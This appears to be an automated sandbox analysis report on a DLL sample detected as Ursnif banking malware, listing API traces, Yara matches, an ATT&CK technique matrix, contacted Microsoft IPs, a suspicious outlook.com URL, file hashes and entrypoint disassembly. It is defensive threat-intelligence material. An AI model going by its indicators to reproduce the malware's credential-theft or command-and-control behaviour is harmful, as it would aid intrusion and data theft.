Source: C:\Windows\System32\loaddll32.exe	Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW,	0_2_6E16701E
Source: C:\Windows\System32\loaddll32.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	0_2_6E15185F
Source: C:\Windows\System32\loaddll32.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,	0_2_6E14A8B9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,	3_2_6E16770D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,	3_2_6E1677BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,	3_2_6E1675E3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	3_2_6E151A40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	3_2_6E167292
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	3_2_6E151AC6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	3_2_6E1672EE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	3_2_6E16736B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,	3_2_6E1673EE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW,	3_2_6E16701E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	3_2_6E15185F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,	3_2_6E14A8B9

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E101D6E SetThreadPriority,GetSystemTime,SwitchToThread,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,GetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,

0_2_6E101D6E

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_01007EC1 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

3_2_01007EC1

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E14CFA3 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_6E14CFA3

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E101800 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

0_2_6E101800

Stealing of Sensitive Information:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000003.00000003.536297010.0000000005618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.536331315.0000000005618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.536410675.0000000005618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.536390845.0000000005618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.536247273.0000000005618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.536484271.0000000005618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.595047356.0000000005618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.536426256.0000000005618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.536360413.0000000005618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6732, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000003.00000003.536297010.0000000005618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.536331315.0000000005618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.536410675.0000000005618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.536390845.0000000005618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.536247273.0000000005618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.536484271.0000000005618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.595047356.0000000005618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.536426256.0000000005618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.536360413.0000000005618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6732, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation1	Path Interception	Process Injection12	Masquerading1	OS Credential Dumping	System Time Discovery2	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API1	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection12	LSASS Memory	Query Registry1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Deobfuscate/Decode Files or Information1	Security Account Manager	Security Software Discovery3	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information2	NTDS	Process Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol3	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Rundll321	LSA Secrets	Account Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Software Packing1	Cached Domain Credentials	System Owner/User Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	File and Directory Discovery2	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	System Information Discovery23	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
iJdlvBxhYu.dll	6%	Virustotal		Browse
iJdlvBxhYu.dll	0%	ReversingLabs

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
3.2.rundll32.exe.1000000.1.unpack	100%	Avira	HEUR/AGEN.1108168		Download File

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
outlook.com	40.97.128.194	true	false	high
HHN-efz.ms-acdc.office.com	52.97.150.2	true	false	high
FRA-efz.ms-acdc.office.com	52.97.201.82	true	false	high
www.outlook.com	unknown	unknown	false	high
outlook.office365.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://outlook.com/login/greed/dTdjBCYANBp89r_2BxCJb/gK6KRSDvLFl65FiM/sVGCJkg_2FiGctf/t6MCq4h_2BQjlakLCK/wiH0Ze_2B/jucB0Ra6kWTVhbib9MO1/jbq6SBoLka4DWlxdGWZ/y4sF0OuALvDiDjUoj2_2B_/2FCnNAucowWTY/QocXWkvP/dNKrsXhuwJ0UrXUCqZRpNCx/r6rZ7E04g_/2B8ZRdIhu4yR4YZKp/tqA3A0JYvM/21FVchV.gfk	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://outlook.office365.com/login/greed/dTdjBCYANBp89r_2BxCJb/gK6KRSDvLFl65FiM/sVGCJkg_2FiGctf/t6M	~DF0D80EB75D4D79339.TMP.15.dr, {C4CF6A29-AD44-11EB-90E5-ECF4BB2D2496}.dat.15.dr	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
52.97.150.2	HHN-efz.ms-acdc.office.com	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
40.97.128.194	outlook.com	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
52.97.201.82	FRA-efz.ms-acdc.office.com	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	404149
Start date:	04.05.2021
Start time:	18:51:40
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 48s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	iJdlvBxhYu.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	22
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal60.troj.winDLL@12/5@3/4
EGA Information:	Failed
HDC Information:	Successful, ratio: 9.2% (good quality ratio 8.7%) Quality average: 79.3% Quality standard deviation: 28.8%
HCA Information:	Successful, ratio: 85% Number of executed functions: 47 Number of non-executed functions: 72
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .dll
Warnings:	Show All Excluded IPs from analysis (whitelisted): 13.64.90.137, 92.122.145.220, 52.147.198.201, 104.43.193.48, 8.238.27.126, 8.238.28.254, 8.241.79.126, 8.238.29.254, 8.241.88.254, 2.20.142.209, 2.20.142.210, 20.190.160.132, 20.190.160.6, 20.190.160.67, 20.190.160.71, 20.190.160.136, 20.190.160.4, 20.190.160.8, 20.190.160.73, 20.82.210.154, 92.122.213.247, 92.122.213.194, 184.30.24.56, 88.221.62.148, 152.199.19.161, 40.64.100.89, 52.155.217.156 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, mw1eap.displaycatalog.md.mp.microsoft.com.akadns.net, fg.download.windowsupdate.com.c.footprint.net, displaycatalog-rp-uswest.md.mp.microsoft.com.akadns.net, arc.msn.com.nsatc.net, 2-01-3cf7-0009.cdx.cedexis.net, store-images.s-microsoft.com-c.edgekey.net, wu-fg-shim.trafficmanager.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, go.microsoft.com, login.live.com, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, consumerrp-displaycatalog-aks2eap-uswest.md.mp.microsoft.com.akadns.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, ie9comview.vo.msecnd.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, download.windowsupdate.com, a767.dscg3.akamai.net, www.tm.a.prd.aadg.akadns.net, displaycatalog-uswesteap.md.mp.microsoft.com.akadns.net, login.msa.msidentity.com, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, go.microsoft.com.edgekey.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, www.tm.lg.prod.aadmsa.trafficmanager.net, cs9.wpc.v0cdn.net Report size getting too big, too many NtOpenKeyEx calls found.

Simulations

Behavior and APIs

Time	Type	Description
18:53:49	API Interceptor	1x Sleep call for process: rundll32.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
52.97.150.2	SCAN08364720 #45836(PDF).pdf.htm	Get hash	malicious	Browse
40.97.128.194	http://outlook.com/owa/airmasteraustralia.onmicrosoft.com	Get hash	malicious	Browse	outlook.com/owa/airmasteraustralia.onmicrosoft.com
52.97.201.82	DHL Notification -AWB DHL-2021011293002.exe	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
HHN-efz.ms-acdc.office.com	8OKQ6ogGRx.dll	Get hash	malicious	Browse	40.101.138.2
	609110f2d14a6.dll	Get hash	malicious	Browse	40.101.137.34
	New%20order%20contract.html	Get hash	malicious	Browse	52.98.175.2
outlook.com	n6osajjc938.exe	Get hash	malicious	Browse	104.47.54.36
	9b3d7f02.exe	Get hash	malicious	Browse	104.47.54.36
	5zc9vbGBo3.exe	Get hash	malicious	Browse	52.101.24.0
	InnAcjnAmG.exe	Get hash	malicious	Browse	104.47.53.36
	8X93Tzvd7V.exe	Get hash	malicious	Browse	52.101.24.0
	u8A8Qy5S7O.exe	Get hash	malicious	Browse	104.47.53.36
	SecuriteInfo.com.Mal.GandCrypt-A.24654.exe	Get hash	malicious	Browse	104.47.54.36
	SecuriteInfo.com.Mal.GandCrypt-A.5674.exe	Get hash	malicious	Browse	104.47.54.36
	SecuriteInfo.com.W32.AIDetect.malware2.29567.exe	Get hash	malicious	Browse	104.47.53.36
	lsass(1).exe	Get hash	malicious	Browse	104.47.59.138
	rtofwqxq.exe	Get hash	malicious	Browse	104.47.53.36
	VufxYArno1.exe	Get hash	malicious	Browse	104.47.53.36
FRA-efz.ms-acdc.office.com	8OKQ6ogGRx.dll	Get hash	malicious	Browse	40.101.81.162
	dechert-Investment078867-xlsx.Html	Get hash	malicious	Browse	52.97.189.66
	murexltd-Investment_265386-xlsx.html	Get hash	malicious	Browse	52.97.188.66
	z2xQEFs54b.exe	Get hash	malicious	Browse	52.97.250.226
	sgs-Investment974041-xlsx.Html	Get hash	malicious	Browse	40.101.19.162
	roccor-invoice-648133_xls.HtMl	Get hash	malicious	Browse	52.97.200.162
	redwirespace-invoice-982323_xls.HtMl	Get hash	malicious	Browse	40.101.12.82
	prismcosec-invoice-647718_xls.HtMl	Get hash	malicious	Browse	40.101.81.130
	E848.tmp.exe	Get hash	malicious	Browse	40.101.81.130
	Payment.html	Get hash	malicious	Browse	52.97.250.194
	Remittance advice.htm	Get hash	malicious	Browse	52.97.250.210
	0G2gue8shl.exe	Get hash	malicious	Browse	52.97.176.2
	February Payroll.xls.htm	Get hash	malicious	Browse	52.97.250.242
	PURCHASE ORDER#34556558.exe	Get hash	malicious	Browse	52.97.200.178
	Proforma Invoice.exe	Get hash	malicious	Browse	52.97.250.210
	E-DEKONT.exe	Get hash	malicious	Browse	52.97.144.178
	DHL Notification -AWB DHL-2021011293002.exe	Get hash	malicious	Browse	52.97.201.82
	DHL DOCS.exe	Get hash	malicious	Browse	40.101.80.2
	ORDER REQUEST.exe	Get hash	malicious	Browse	40.101.121.34
	INVOICE.exe	Get hash	malicious	Browse	52.97.188.66

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
MICROSOFT-CORP-MSN-AS-BLOCKUS	2f50000.exe	Get hash	malicious	Browse	52.141.33.89
	609110f2d14a6.dll	Get hash	malicious	Browse	40.101.137.34
	EBqJhAymeE.rtf	Get hash	malicious	Browse	157.55.173.72
	QXfU5ZSUpd.exe	Get hash	malicious	Browse	20.194.35.6
	813oo3jeWE.exe	Get hash	malicious	Browse	20.184.2.45
	pog.exe	Get hash	malicious	Browse	40.124.7.222
	8UsA.sh	Get hash	malicious	Browse	20.233.3.158
	pog.exe	Get hash	malicious	Browse	40.124.7.222
	nT7K5GG5km	Get hash	malicious	Browse	40.96.198.202
	KnAY2OIPI3	Get hash	malicious	Browse	20.177.182.208
	krJF4BtzSv.exe	Get hash	malicious	Browse	65.52.188.118
	DSOneApp(1).exe	Get hash	malicious	Browse	40.126.31.141
	INV 57474545.doc	Get hash	malicious	Browse	65.52.188.118
	kr.ps1	Get hash	malicious	Browse	204.79.197.200
	JRyLnlTR1O	Get hash	malicious	Browse	20.176.121.146
	New%20order%20contract.html	Get hash	malicious	Browse	52.98.175.2
	ldr.sh	Get hash	malicious	Browse	20.3.143.189
	y6f8O0kbEB.exe	Get hash	malicious	Browse	65.52.188.118
	confirm this order and sign PI.exe	Get hash	malicious	Browse	13.66.245.231
	CMEpJtxLhf.exe	Get hash	malicious	Browse	52.168.94.29
MICROSOFT-CORP-MSN-AS-BLOCKUS	2f50000.exe	Get hash	malicious	Browse	52.141.33.89
	609110f2d14a6.dll	Get hash	malicious	Browse	40.101.137.34
	EBqJhAymeE.rtf	Get hash	malicious	Browse	157.55.173.72
	QXfU5ZSUpd.exe	Get hash	malicious	Browse	20.194.35.6
	813oo3jeWE.exe	Get hash	malicious	Browse	20.184.2.45
	pog.exe	Get hash	malicious	Browse	40.124.7.222
	8UsA.sh	Get hash	malicious	Browse	20.233.3.158
	pog.exe	Get hash	malicious	Browse	40.124.7.222
	nT7K5GG5km	Get hash	malicious	Browse	40.96.198.202
	KnAY2OIPI3	Get hash	malicious	Browse	20.177.182.208
	krJF4BtzSv.exe	Get hash	malicious	Browse	65.52.188.118
	DSOneApp(1).exe	Get hash	malicious	Browse	40.126.31.141
	INV 57474545.doc	Get hash	malicious	Browse	65.52.188.118
	kr.ps1	Get hash	malicious	Browse	204.79.197.200
	JRyLnlTR1O	Get hash	malicious	Browse	20.176.121.146
	New%20order%20contract.html	Get hash	malicious	Browse	52.98.175.2
	ldr.sh	Get hash	malicious	Browse	20.3.143.189
	y6f8O0kbEB.exe	Get hash	malicious	Browse	65.52.188.118
	confirm this order and sign PI.exe	Get hash	malicious	Browse	13.66.245.231
	CMEpJtxLhf.exe	Get hash	malicious	Browse	52.168.94.29

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{C4CF6A27-AD44-11EB-90E5-ECF4BB2D2496}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	29272
Entropy (8bit):	1.7690028446621529
Encrypted:	false
SSDEEP:	48:IwOGcprWGwpL3G/ap8vZGIpcKGYGvnZpvKcGomRqp9KXGo4qW1pmEjGWmzy1MGWu:rSZOZ/2vLWbt6AfPqW1MfODIL+TNRDB
MD5:	7002C28F8DAFB19C321D8F3802742CAC
SHA1:	10586DB11264F5FB282E742B7C439209155B4A41
SHA-256:	AF3751488A7F551AE1A019B306EC610845E7424749F28AE6BF40C9F8BDFEC153
SHA-512:	74ABC47BE2FA0394B397E0BCC83052452EC870C0141D01FF9CCAC3A284C556DD7464D9692CABAC3A64A7B015B5C5EC0A5153F528752C65ABC0D3F463CEF1D2DB
Malicious:	false
Reputation:	low
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{C4CF6A29-AD44-11EB-90E5-ECF4BB2D2496}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27440
Entropy (8bit):	1.8692767005485296
Encrypted:	false
SSDEEP:	192:r+ZdQF6fkZj52dWxMN64GBKG7x4GBKGuA:rKiwcVI0Kguouq
MD5:	8FA8A2AC554320BF7B927691D0E9AA33
SHA1:	37BB604AF62C4236281E0640728FAB1A40E61068
SHA-256:	5CFA609F2EE9DD30D833ADF282288AB25CBE0619EF014B63A2D71DD0636FD61E
SHA-512:	DC3570C168CC2174D16E1908AAFB7C3C4BDD8E13192131EAFA8FB6F91D7E4717CFF5B49FC9B29F6E41D77A18388A53EFD7668760024C4603851EECE097196909
Malicious:	false
Reputation:	low
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\JavaDeployReg.log Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	89
Entropy (8bit):	4.440534734931472
Encrypted:	false
SSDEEP:	3:oVXUWRFEfQRcS4T48JOGXnEWRFEfQRcS4uULun:o9UChcwqEChcS7
MD5:	5B1B55767347E99D9DF8CFDEA6ABE92F
SHA1:	21E2F35CA929750943C12141583CCA5D3EAB76A3
SHA-256:	A93DEB522A49F2709E978A2F8F1B8A35FBF8B9EAFA8AF6499EC096BE71E0555A
SHA-512:	B4FE7A36552EE0BF60DB9781C17B8A7F2E8B81D6C67B1480319C26C1E6B8D898AAC7C23374414E59594A65E67E4404BCBBDEE0EB22D9929EE6BD833EA1DBF570
Malicious:	false
Reputation:	low
Preview:	[2021/05/04 18:54:05.717] Latest deploy version: ..[2021/05/04 18:54:05.717] 11.211.2 ..

C:\Users\user\AppData\Local\Temp\~DF0D80EB75D4D79339.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	39777
Entropy (8bit):	0.6001466555757741
Encrypted:	false
SSDEEP:	192:kBqoxKAuqR+CkuH0S4GBKGz4GBKG/4GBKGE:kBqoxKAuqR+CkuH0SuWueuX
MD5:	648119EC3976EFE617D1F81C477C1B69
SHA1:	941D0AD9905FF41F28A51FC7463C7E80E63DFBAC
SHA-256:	0AE66953DBE3EBBC42F7D50BFF3568F07E10D28C9205B89CBCADFA5FD327A0D4
SHA-512:	3DD2AEF4769544D679FE1BCDF7D18408AE61C5070D1123914D46CC4AED5890D0F217B31AC77990A554A2ED7CE49D694030A85F17B9223D62516C97E765186ED5
Malicious:	false
Reputation:	low
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF222070F69DD5E09D.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	12933
Entropy (8bit):	0.4101257122829776
Encrypted:	false
SSDEEP:	24:c9lLh9lLh9lIn9lIn9lof9lof9lWJatrFat5B:kBqoIAeo10fB
MD5:	0182845E86B74629EC312B38783F6A31
SHA1:	B0FBDA728E7F1458FF95368C850A0CC9F5C534B8
SHA-256:	73172B66EC5FE590A7CC6F5F2CC197082ABCC57AF15A2943A739F91995081D4F
SHA-512:	8FD0EEE8E84724EC60A73A512D834F87297AD6A40260A25C4EF97BD0CFE513B690B177164E351D32AAD994E1A12D211486826BCC5038CA629E4C65AED74745C5
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.549323607622641
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	iJdlvBxhYu.dll
File size:	523264
MD5:	18d613d02eaf8d339feebb21f578f329
SHA1:	01ea39853139ccfe82f0bd19f8963d3ccebf8e8a
SHA256:	bd43f7bc23a76b086a81b8e6fcd4355cac648d3f7d9a941d9aa259def534d5b1
SHA512:	a432ca4267f56530945e2dd352e658d72b3fc84101b84dcd86bc0adcf42e218e394556d6b69cec92cb30a960ce83586e8c026e971f02fa5154d100a198f1e4ce
SSDEEP:	12288:CddaT8lLVrp6I7MsfHqWxSWlNTjGoLYTbgOJpXLH:Cddhp1YCMuFx/jGo0XL
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................^.G.......T......AN.......V.......i.......h.....^.B...............l.......U.......R.......W.....Rich...........

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x104a38a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x1000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x6089CC25 [Wed Apr 28 20:57:09 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	61abfa6d76443dd7d018df0c9cf8b0a5

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 01h
jne 00007FD0D4954B07h
call 00007FD0D495B0D4h
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+08h]
call 00007FD0D4954B0Ch
add esp, 0Ch
pop ebp
retn 000Ch
push 0000000Ch
push 0107B4A8h
call 00007FD0D4955A1Ch
xor eax, eax
inc eax
mov esi, dword ptr [ebp+0Ch]
test esi, esi
jne 00007FD0D4954B0Eh
cmp dword ptr [0118E36Ch], esi
je 00007FD0D4954BEAh
and dword ptr [ebp-04h], 00000000h
cmp esi, 01h
je 00007FD0D4954B07h
cmp esi, 02h
jne 00007FD0D4954B37h
mov ecx, dword ptr [01075238h]
test ecx, ecx
je 00007FD0D4954B0Eh
push dword ptr [ebp+10h]
push esi
push dword ptr [ebp+08h]
call ecx
mov dword ptr [ebp-1Ch], eax
test eax, eax
je 00007FD0D4954BB7h
push dword ptr [ebp+10h]
push esi
push dword ptr [ebp+08h]
call 00007FD0D4954916h
mov dword ptr [ebp-1Ch], eax
test eax, eax
je 00007FD0D4954BA0h
mov ebx, dword ptr [ebp+10h]
push ebx
push esi
push dword ptr [ebp+08h]
call 00007FD0D4952376h
mov edi, eax
mov dword ptr [ebp-1Ch], edi
cmp esi, 01h
jne 00007FD0D4954B2Ah
test edi, edi
jne 00007FD0D4954B26h
push ebx
push eax
push dword ptr [ebp+08h]
call 00007FD0D495235Eh
push ebx
push edi
push dword ptr [ebp+08h]
call 00007FD0D49548DCh
mov eax, dword ptr [01075238h]
test eax, eax
je 00007FD0D4954B09h
push ebx
push edi
push dword ptr [ebp+08h]
call eax

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x7bbd0	0x58	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x7bc28	0x64	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x191000	0x498	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x192000	0x2818	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x6b200	0x38	.rdata
